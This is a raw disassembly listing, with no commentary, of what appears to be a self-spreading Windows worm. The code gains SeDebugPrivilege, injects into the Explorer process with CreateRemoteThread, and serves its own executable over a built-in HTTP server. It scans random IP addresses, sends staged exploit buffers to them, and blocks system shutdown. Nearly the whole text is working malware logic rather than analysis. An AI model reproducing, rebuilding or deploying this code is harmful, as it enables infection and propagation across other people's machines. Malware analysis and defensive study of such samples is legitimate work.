call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
cmp eax, 46h
jl loc_30901D04
cmp [ebp+var_730], 31h
jnz loc_30901BAF
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_30902C76 ; memset
add esp, 0Ch
push offset byte_30904328
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_30904328
push eax
call sub_30902C82 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_30902C82 ; memcpy
mov eax, dword_30904C2E
add esp, 0Ch
mov [ebp+var_798], eax
loc_30901A50: ; CODE XREF: sub_309017B9+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 68h
push offset dword_3090486C
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 0A0h
push offset dword_309048D8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
cmp [ebp+arg_0], 0
jz loc_30901C9F
push 68h
lea eax, [ebp+var_89E4]
push offset dword_30904A90
push eax
call sub_30902C82 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_30902C82 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_30904AFC
push eax
call sub_30902C82 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_30902C82 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_30904B70
push eax
call sub_30902C82 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_30901CF7
; ---------------------------------------------------------------------------
loc_30901BAF: ; CODE XREF: sub_309017B9+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_30902C76 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_30904C68
push eax
call sub_30902C82 ; memcpy
push offset byte_30904328
call sub_30902C7C ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_30904328
push eax
call sub_30902C82 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_30904CE0
push eax
call sub_30902C82 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_30904C68
push eax
call sub_30902C82 ; memcpy
add esp, 40h
push offset byte_30904328
call sub_30902C7C ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_30904328
push eax
call sub_30902C82 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_30901C4B: ; CODE XREF: sub_309017B9+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_30901C4B
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_30902C76 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_30902C76 ; memset
add esp, 18h
jmp loc_30901A50
; ---------------------------------------------------------------------------
loc_30901C9F: ; CODE XREF: sub_309017B9+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3090497C
push eax
call sub_30902C82 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_30902C82 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_309049FC
push eax
call sub_30902C82 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_30901CF7: ; CODE XREF: sub_309017B9+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_30901D04: ; CODE XREF: sub_309017B9+1AD�j
; sub_309017B9+1E1�j ...
push 2
push [ebp+var_4]
call dword_3090116C ; shutdown
loc_30901D0F: ; CODE XREF: sub_309017B9+166�j
push [ebp+var_4]
call dword_30901170 ; closesocket
pop esi
loc_30901D19: ; CODE XREF: sub_309017B9+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_309017B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901D20 proc near ; CODE XREF: UPX0:loc_3090232E�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_309010A4 ; LoadLibraryA
mov esi, dword_309010A0
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_30901DA4
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_30901DA4
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_30901DA4
lea eax, [ebp+var_C]
push eax
push 20h
call dword_3090109C ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_30901DA4: ; CODE XREF: sub_30901D20+28�j
; sub_30901D20+37�j ...
pop edi
pop esi
leave
retn
sub_30901D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901DA8 proc near ; CODE XREF: UPX0:30902342�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_30905030
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_309010B0 ; GetModuleHandleA
mov esi, dword_309010A0
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_30901DEF
loc_30901DEB: ; CODE XREF: sub_30901DA8+54�j
push 1
jmp short loc_30901E40
; ---------------------------------------------------------------------------
loc_30901DEF: ; CODE XREF: sub_30901DA8+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_30901DEB
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_3090110C ; FindWindowA
test eax, eax
jnz short loc_30901E1D
call dword_30901110 ; GetForegroundWindow
test eax, eax
jnz short loc_30901E1D
push 2
jmp short loc_30901E40
; ---------------------------------------------------------------------------
loc_30901E1D: ; CODE XREF: sub_30901DA8+65�j
; sub_30901DA8+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_30901114 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_309010AC ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_30901E43
push 3
loc_30901E40: ; CODE XREF: sub_30901DA8+45�j
; sub_30901DA8+73�j
pop eax
jmp short loc_30901EAE
; ---------------------------------------------------------------------------
loc_30901E43: ; CODE XREF: sub_30901DA8+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3090107C
test eax, eax
jz short loc_30901EA1
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_309010A8 ; WriteProcessMemory
push dword_30905024
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_30901E8D
push eax
call esi ; CloseHandle
jmp short loc_30901EA8
; ---------------------------------------------------------------------------
loc_30901E8D: ; CODE XREF: sub_30901DA8+DE�j
push offset aUterm16 ; "uterm16"
call sub_30901EE1
pop ecx
mov [ebp+var_4], 5
jmp short loc_30901EA8
; ---------------------------------------------------------------------------
loc_30901EA1: ; CODE XREF: sub_30901DA8+B2�j
mov [ebp+var_4], 4
loc_30901EA8: ; CODE XREF: sub_30901DA8+E3�j
; sub_30901DA8+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_30901EAE: ; CODE XREF: sub_30901DA8+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901DA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901EB3 proc near ; CODE XREF: sub_3090217C+B�p
; UPX0:30902304�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_309010B4 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_309010E8 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901EB3 endp
; =============== S U B R O U T I N E =======================================
sub_30901EE1 proc near ; CODE XREF: sub_30901DA8+EA�p
; UPX0:3090230E�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_309010B8 ; CreateMutexA
retn
sub_30901EE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901EF0 proc near ; CODE XREF: sub_3090236A+143�p
; sub_3090236A+14E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010BC ; CreateThread
pop ebp
retn
sub_30901EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F0A proc near ; CODE XREF: sub_3090217C+12C�p
; sub_30902569+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010BC ; CreateThread
push eax
call dword_3090107C ; CloseHandle
pop ebp
retn
sub_30901F0A endp
; =============== S U B R O U T I N E =======================================
sub_30901F2B proc near ; CODE XREF: sub_309011A0+68�p
; sub_30902A3A+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_30901F53
loc_30901F3C: ; CODE XREF: sub_30901F2B+26�j
call dword_309010F8 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_30901F3C
loc_30901F53: ; CODE XREF: sub_30901F2B+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_30901F2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F5B proc near ; CODE XREF: sub_309011A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_30902C76 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_309010C0 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3090107C
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_30901F5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901FB1 proc near ; CODE XREF: sub_309025F1+3E�p
; sub_309026B8+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_30901148 ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_30901FD2
call dword_3090114C ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_30901FD2: ; CODE XREF: sub_30901FB1+15�j
lea eax, [ebp+var_34]
push eax
call dword_30901150 ; gethostbyname
test eax, eax
jnz short loc_30901FE7
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_30901FE7: ; CODE XREF: sub_30901FB1+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_30901FB1 endp
; =============== S U B R O U T I N E =======================================
sub_30901FF0 proc near ; CODE XREF: sub_30902505+22�p
; sub_30902569+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3090112C ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_30901FF0 endp
; =============== S U B R O U T I N E =======================================
sub_30902006 proc near ; CODE XREF: sub_3090236A+40�p
; sub_3090236A+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_309010C8 ; OpenEventA
test eax, eax
jz short locret_3090201F
push eax
call dword_309010C4 ; SetEvent
locret_3090201F: ; CODE XREF: sub_30902006+10�j
retn
sub_30902006 endp
; =============== S U B R O U T I N E =======================================
sub_30902020 proc near ; CODE XREF: sub_3090169C+29�p
push esi
mov esi, dword_309010F8
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_30902020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902036 proc near ; DATA XREF: sub_3090217C+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_30902067
push 1
jmp loc_30902122
; ---------------------------------------------------------------------------
loc_30902067: ; CODE XREF: sub_30902036+28�j
mov esi, dword_30901100
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_30902132
lea eax, [ebp+var_100]
push offset a_exe ; ".exe"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_30902132
mov esi, dword_30901164
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_30905020
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_30901118 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_30902C7C ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_309020E4: ; CODE XREF: sub_30902036+E8�j
mov eax, dword_30905020
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_309020F6
mov eax, ecx
loc_309020F6: ; CODE XREF: sub_30902036+BC�j
test eax, eax
jz short loc_30902125
push 0
push eax
mov eax, dword_30905018
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_30902120
cmp eax, 1000h
jb short loc_30902125
push 64h
add edi, eax
call dword_30901094 ; Sleep
jmp short loc_309020E4
; ---------------------------------------------------------------------------
loc_30902120: ; CODE XREF: sub_30902036+D5�j
push 2
loc_30902122: ; CODE XREF: sub_30902036+2C�j
pop eax
jmp short loc_30902175
; ---------------------------------------------------------------------------
loc_30902125: ; CODE XREF: sub_30902036+C2�j
; sub_30902036+DC�j
push offset dword_3090501C
call dword_309010D0 ; InterlockedIncrement
jmp short loc_30902150
; ---------------------------------------------------------------------------
loc_30902132: ; CODE XREF: sub_30902036+49�j
; sub_30902036+61�j
mov esi, dword_30901164
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_30904DA8
push ebx
call esi ; send
loc_30902150: ; CODE XREF: sub_30902036+FA�j
push 7D0h
call dword_30901094 ; Sleep
push 2
push ebx
call dword_3090116C ; shutdown
push ebx
call dword_30901170 ; closesocket
push 0
call dword_309010CC ; ExitThread
xor eax, eax
loc_30902175: ; CODE XREF: sub_30902036+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_30902036 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090217C proc near ; DATA XREF: sub_3090236A+13E�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_30901EB3
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_3090501C, ebx
call sub_30902828
add esp, 14h
test eax, eax
jnz loc_309022B1
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_30901080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_309021E8
push 1
call dword_309010CC ; ExitThread
loc_309021E8: ; CODE XREF: sub_3090217C+62�j
push ebx
push esi
call dword_309010D8 ; GetFileSize
push eax
mov dword_30905020, eax
call sub_30902C44
pop ecx
mov dword_30905018, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_30905020
push eax
push esi
call dword_309010D4 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_30905020, eax
call dword_3090107C ; CloseHandle
push ebx
push 1
push 2
call dword_30901154 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_30902C76 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_3090224A: ; CODE XREF: sub_3090217C+E5�j
; sub_3090217C+ED�j ...
call dword_309010F8 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_3090502C, eax
jz short loc_3090224A
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_3090224A
push eax
call dword_3090115C ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_3090113C ; bind
test eax, eax
jnz short loc_3090224A
push 64h
push edi
call dword_30901140 ; listen
mov [ebp+var_8], esi
pop esi
loc_30902293: ; CODE XREF: sub_3090217C+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_30901144 ; accept
push eax
push offset sub_30902036
call sub_30901F0A
pop ecx
pop ecx
jmp short loc_30902293
; ---------------------------------------------------------------------------
loc_309022B1: ; CODE XREF: sub_3090217C+3D�j
push ebx
call dword_309010CC ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_3090217C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309022C0 proc near ; CODE XREF: sub_3090236A:loc_309024A2�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_30901138
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_309022C0 endp
; ---------------------------------------------------------------------------
loc_309022EC: ; CODE XREF: UPX1:30907CA8�j
push 0
call dword_309010B0 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_30905030, eax
call dword_30901074 ; DeleteFileA
call sub_30901EB3
push offset aUterm16 ; "uterm16"
call sub_30901EE1
pop ecx
mov dword_30905024, eax
call dword_309010E0 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_3090232E
push 1
call dword_309010DC ; ExitProcess
loc_3090232E: ; CODE XREF: UPX0:30902324�j
call sub_30901D20
call sub_3090298C
call sub_30902B06
push offset sub_3090236A
call sub_30901DA8
test eax, eax
pop ecx
jz short loc_30902353
push 0
call sub_3090236A
loc_30902353: ; CODE XREF: UPX0:3090234A�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_30902356 proc near ; CODE XREF: sub_3090236A:loc_309024CB�p
; sub_30902505:loc_3090251E�p ...
push 0
push dword_30905028
call dword_30901070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_30902356 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090236A proc near ; CODE XREF: UPX0:3090234E�p
; DATA XREF: UPX0:3090233D�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901188
push offset loc_30902C70
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU16x ; "u16x"
xor edi, edi
push edi
push 1
push edi
call dword_3090106C ; CreateEventA
mov dword_30905028, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU11x ; "u11x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU12x ; "u12x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU13x ; "u13x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU14x ; "u14x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU15x ; "u15x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU8 ; "u8"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU9 ; "u9"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU10 ; "u10"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU11 ; "u11"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU12 ; "u12"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU13 ; "u13"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU13i ; "u13i"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU14 ; "u14"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU15 ; "u15"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU16 ; "u16"
call sub_30901EE1
pop ecx
cmp [ebp+arg_0], edi
jz short loc_309024A2
push offset aWs2_32 ; "ws2_32"
mov esi, dword_309010A4
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm16 ; "uterm16"
call sub_30901EE1
pop ecx
mov dword_30905024, eax
loc_309024A2: ; CODE XREF: sub_3090236A+FD�j
call sub_309022C0
push edi
push offset sub_3090217C
call sub_30901EF0
push edi
push offset sub_3090169C
call sub_30901EF0
push edi
push offset loc_30902714
call sub_30901EF0
add esp, 18h
loc_309024CB: ; CODE XREF: sub_3090236A+17C�j
call sub_30902356
test eax, eax
jnz short loc_309024E8
push edi
call dword_30901018 ; AbortSystemShutdownA
push 1388h
call dword_30901094 ; Sleep
jmp short loc_309024CB
; ---------------------------------------------------------------------------
loc_309024E8: ; CODE XREF: sub_3090236A+168�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_3090236A endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902505 proc near ; DATA XREF: sub_30902569+55�o
; sub_309025F1+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_30902514
push 1
pop eax
jmp short locret_30902565
; ---------------------------------------------------------------------------
loc_30902514: ; CODE XREF: sub_30902505+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_3090251E: ; CODE XREF: sub_30902505+5A�j
call sub_30902356
test eax, eax
jnz short loc_30902561
call sub_30901FF0
test eax, eax
jz short loc_30902561
cmp [ebp+var_1], bl
jz short loc_3090255A
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_309017B9
movzx esi, word_3090503C
pop ecx
call dword_309010F8 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_30901094 ; Sleep
loc_3090255A: ; CODE XREF: sub_30902505+2E�j
inc bl
cmp bl, 0FFh
jb short loc_3090251E
loc_30902561: ; CODE XREF: sub_30902505+20�j
; sub_30902505+29�j
pop esi
xor eax, eax
pop ebx
locret_30902565: ; CODE XREF: sub_30902505+D�j
leave
retn 4
sub_30902505 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902569 proc near ; DATA XREF: sub_309025F1+7E�o
; UPX0:309027A9�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_30902577
push 1
pop eax
jmp short loc_309025ED
; ---------------------------------------------------------------------------
loc_30902577: ; CODE XREF: sub_30902569+7�j
push ebx
push esi
push edi
call sub_30901EB3
mov esi, dword_309010F8
xor ebx, ebx
loc_30902587: ; CODE XREF: sub_30902569+7D�j
call sub_30902356
test eax, eax
jnz short loc_309025E8
call sub_30901FF0
test eax, eax
jz short loc_309025E8
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_30905034
mov byte ptr [ebp+arg_0+3], al
call dword_309010D0 ; InterlockedIncrement
push [ebp+arg_0]
call sub_309017B9
test eax, eax
pop ecx
jnz short loc_309025CA
push [ebp+arg_0]
push offset sub_30902505
call sub_30901F0A
pop ecx
pop ecx
loc_309025CA: ; CODE XREF: sub_30902569+50�j
movzx edi, word_3090503C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_30901094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_30902587
loc_309025E8: ; CODE XREF: sub_30902569+25�j
; sub_30902569+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_309025ED: ; CODE XREF: sub_30902569+C�j
pop ebp
retn 4
sub_30902569 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309025F1 proc near ; DATA XREF: UPX0:309027C1�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_30901EB3
call sub_30902356
test eax, eax
jnz loc_309026AA
push ebx
mov ebx, dword_30901094
push esi
mov esi, dword_309010F8
push edi
loc_30902617: ; CODE XREF: sub_309025F1+48�j
; sub_309025F1+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_30902626: ; CODE XREF: sub_309025F1+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_30902626
call sub_30901FB1
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_30902617
call sub_30901FF0
test eax, eax
jz short loc_30902682
push offset dword_30905034
call dword_309010D0 ; InterlockedIncrement
push edi
call sub_309017B9
test eax, eax
pop ecx
jnz short loc_30902689
push edi
push offset sub_30902505
call sub_30901F0A
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3090266E: ; CODE XREF: sub_309025F1+8D�j
push edi
push offset sub_30902569
call sub_30901F0A
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3090266E
jmp short loc_30902689
; ---------------------------------------------------------------------------
